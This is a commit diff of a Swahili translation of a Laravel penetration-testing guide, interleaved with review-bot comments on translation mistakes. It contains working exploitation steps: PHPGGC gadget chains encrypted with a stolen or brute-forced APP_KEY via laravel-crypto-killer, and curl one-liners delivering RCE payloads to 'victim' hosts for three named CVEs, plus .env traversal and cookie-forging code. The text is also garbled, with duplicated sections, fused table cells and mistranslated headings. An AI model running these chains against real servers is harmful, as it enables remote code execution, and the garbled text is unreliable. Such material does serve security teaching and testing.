Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

This commit is contained in:
Translator 2025-08-04 22:30:15 +00:00
parent 52b5bc0950
commit 9606a44636


@ -11,7 +11,7 @@ Soma habari kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-l
## APP_KEY & Msingi wa Uthibitishaji (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC uaminifu chini ya uso (`Illuminate\\Encryption\\Encrypter`).
Ciphertext safi ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
Ciphertext ya raw ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
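Review bot: the heading `## APP_KEY & Msingi wa Uthibitishaji` renders "Encryption internals" as "Msingi wa Uthibitishaji" (authentication basics), which points the reader at the wrong concept; the second copy of this heading further down the file keeps "Encryption internals", so either keep the English term or use a term that actually means encryption (e.g. "Mambo ya ndani ya usimbaji"). In the same hunk "HMAC uaminifu" (trustworthiness) should be "HMAC uadilifu" (integrity), which is the wording the duplicate line later in this file already uses. The "Ciphertext safi" to "Ciphertext ya raw" change is fine as a correction but leaves "raw" untranslated.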
@ -29,12 +29,12 @@ use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Ingiza string iliyozalishwa kwenye chochote kilichovuja `decrypt()` sink (paramu ya njia, cookie, kikao, …).
Ingiza mfuatano uliozalishwa kwenye chochote kilicho hatarini `decrypt()` sink (paramu ya njia, cookie, kikao, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inafanya mchakato mzima kuwa wa kiotomatiki na kuongeza hali rahisi ya **bruteforce**:
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inaweka mchakato mzima kuwa otomatiki na kuongeza hali rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
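Review bot: terminology for the sink sentence is inconsistent with the rest of this change: the new line uses "paramu ya njia" for route parameter, while the exploitation steps added later in this same commit use "parameta ya route"; pick one and use it throughout. The replacement of "kilichovuja" (leaked) by "kilicho hatarini" (vulnerable) is correct and should stay, since the sentence is about a vulnerable `decrypt()` sink, not a leaked one. The laravel-crypto-killer line reads fine in both variants; "inaweka ... kuwa otomatiki" is the more natural of the two.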
@ -45,66 +45,76 @@ laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
The script inasaidia kwa uwazi payloads za CBC na GCM na inarejesha uwanja wa HMAC/tag.
---
## Mifano halisi ya udhaifu
| Mradi | Kitu kinachoweza kuathiriwa | Mnyororo wa gadget |
|-------|-----------------------------|--------------------|
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|-------|----------------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
1. Pata `APP_KEY` (mfano wa chaguo-msingi, kuvuja kwa Git, kuvuja kwa config/.env, au brute-force)
2. Zalisha gadget na **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Toa payload kupitia parameter/cookie inayoweza kuathiriwa → **RCE**
1. Pata au fanya brute-force ya `APP_KEY` ya byte 32.
2. Jenga mnyororo wa gadget na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Ficha gadget iliyosajiliwa na **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana.
4. Toa ciphertext kwa sink iliyo hatarini `decrypt()` (parameta ya route, cookie, session …) ili kuanzisha **RCE**.
Hapa chini kuna mistari mifupi inayoonyesha njia kamili ya shambulio kwa kila CVE halisi iliyotajwa hapo juu:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"
# Snipe-IT ≤6 XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
# Crater cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
---
## Ugunduzi wa wingi wa APP_KEY kupitia brute-force ya cookie
## Ugunduzi wa APP_KEY wa Misa kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinavuja mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinatoa mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
* Dataset Julai 2024 » 580 k tokens, **3.99 % funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % funguo zimevunjwa**
* >1 000 seva bado zina udhaifu kwa CVE-2018-15133 ya zamani kwa sababu tokens zinajumuisha moja kwa moja data iliyosimbwa.
* Matumizi makubwa ya funguo Top-10 APP_KEYs zimeandikwa kwa chaguo-msingi ambazo zimesambazwa na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
* Dataset Julai 2024 » 580 k tokens, **3.99 % ya funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % ya funguo zimevunjwa**
* >1 000 seva bado zina hatari kutokana na CVE-2018-15133 ya zamani kwa sababu tokens zina data iliyosimbwa moja kwa moja.
* Matumizi makubwa ya funguo APP_KEYs 10 bora zimeandikwa kwa defaults ambazo zinakuja na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM brute-force hadi ~1.5 bilioni majaribio/s, ikipunguza muda wa kuvunja dataset kamili hadi <2 dakika.
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza uvunjaji wa dataset kamili hadi <2 dakika.
---
## Marejeleo
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
## Hila za Laravel
## Laravel Tricks
### Hali ya Ukarabati
### Modu ya Debugging
Ikiwa Laravel iko katika **modu ya debugging** utaweza kufikia **code** na **data nyeti**.\
Ikiwa Laravel iko katika **hali ya ukarabati** utaweza kufikia **kod** na **data nyeti**.\
Kwa mfano `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
Hii kwa kawaida inahitajika kwa ajili ya kutumia udhaifu mwingine wa RCE wa Laravel.
Hii kwa kawaida inahitajika kwa ajili ya kutumia CVEs nyingine za RCE za Laravel.
### .env
Laravel huhifadhi APP inayotumia kusimbua cookies na akreditivu nyingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia baadhi ya njia za kupita: `/../.env`
Laravel huhifadhi APP inayotumia kusimbua cookies na akreditivu nyingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia njia fulani ya kupita: `/../.env`
Laravel pia itaonyesha habari hii ndani ya ukurasa wa debug (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Laravel pia itaonyesha habari hii ndani ya ukurasa wa ukarabati (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Kwa kutumia APP_KEY ya siri ya Laravel unaweza kusimbua na kusimbua tena cookies:
### Decrypt Cookie
### Futa Cookie
```python
import os
import json
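Review bot: in the table rows `` `/route/{hash}``decrypt($hash)` `` and `` `SESSION_DRIVER=cookie``laravel_session` `` the two code spans are fused with no separator, so the connective between the sink and the call (an arrow in the source page) was lost and the cell renders as one broken span; restore the separator in both the old and new table variants. Several translated terms also change meaning: "Ugunduzi wa APP_KEY wa Misa" uses "Misa" (church Mass) where "wingi" (bulk) in the other heading is the intended sense; "Hali ya Ukarabati" / "hali ya ukarabati" (repair mode) is not debug mode, so keep "Modu ya Debugging"; "### Futa Cookie" (delete cookie) is wrong for "Decrypt Cookie" ("Simbua Cookie"); "kod" is a typo; and "kusimbua na kusimbua tena" says decrypt twice where the sentence means decrypt and re-encrypt ("kusimbua na kusimba tena"). "## Laravel Tricks" is left untranslated next to "## Hila za Laravel"; only one of the two headings should survive.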
@ -165,100 +175,22 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
```
### Laravel Deserialization RCE
Toleo lenye udhaifu: 5.5.40 na 5.6.x kupitia 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Tofauti zinazoweza kutumika: 5.5.40 na 5.6.x kupitia 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization hapa: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Unaweza kujaribu na kutumia kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kutumia kwa metasploit: `use unix/http/laravel_token_unserialize_exec`
Au unaweza pia kutumia metasploit: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
Udhaifu mwingine wa deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
### Laravel SQLInjection
Soma taarifa kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
### Laravel SQLInjection
Soma taarifa kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC uadilifu chini ya uso (`Illuminate\\Encryption\\Encrypter`).
Ciphertext safi ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` itafanya `serialize()` maandiko ya wazi kwa chaguo-msingi, wakati `decrypt($payload, $unserialize=true)` **itautumia kiotomatiki `unserialize()`** thamani iliyofichwa. Hivyo basi **mshambuliaji yeyote anayejua siri ya byte 32 `APP_KEY` anaweza kuunda kitu kilichofichwa cha PHP kilichosajiliwa na kupata RCE kupitia mbinu za kichawi (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Ingiza string iliyozalishwa kwenye chochote kilichovuja `decrypt()` sink (paramu ya njia, cookie, kikao, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inafanya mchakato mzima kuwa wa kiotomatiki na kuongeza hali rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
---
## Mifano halisi ya udhaifu
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|-------|----------------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
1. Pata `APP_KEY` (mfano wa chaguo-msingi, kuvuja kwa Git, kuvuja kwa config/.env, au brute-force)
2. Zalisha gadget na **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Toa payload kupitia parameter/cookie iliyoathirika → **RCE**
---
## Ugunduzi wa wingi wa APP_KEY kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinavuja mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Utafiti uliochapishwa na Synacktiv (2024-2025) umebaini:
* Dataset Julai 2024 » 580 k tokens, **3.99 % funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % funguo zimevunjwa**
* >1 000 seva bado zina udhaifu wa CVE-2018-15133 kwa sababu tokens zinajumuisha moja kwa moja data iliyosimbwa.
* Matumizi makubwa ya funguo Top-10 APP_KEYs zimeandikwa kwa chaguo-msingi ambazo zimesambazwa na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza muda wa kuvunja dataset kamili hadi <2 dakika.
---
## Marejeleo
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
## References
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
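Review bot: the block from `## APP_KEY & Encryption internals (Laravel >=5.6)` down to the first `## Marejeleo` repeats, nearly verbatim, the sections already present earlier in this file (encryption internals, laravel-crypto-killer, real-world examples, mass APP_KEY discovery, references); given the hunk header removes 100 lines and adds 22, confirm that the whole duplicate is on the removed side and none of it survives in the translated file. Likewise `### Laravel SQLInjection` and its "Soma taarifa kuhusu hii hapa" line appear twice back to back. Smaller points: "Tofauti zinazoweza kutumika" (usable differences) is wrong for vulnerable versions, where "Toleo lenye udhaifu" is the correct term; "Hapa unaweza kupata taarifa ... hapa" repeats "hapa"; the French reference "analyse de fuite dAPP_KEY" lost its apostrophe ("d'APP_KEY"); and the new reference list adds an English `## References` heading directly under the Swahili `## Marejeleo`, so one of the two headings should go.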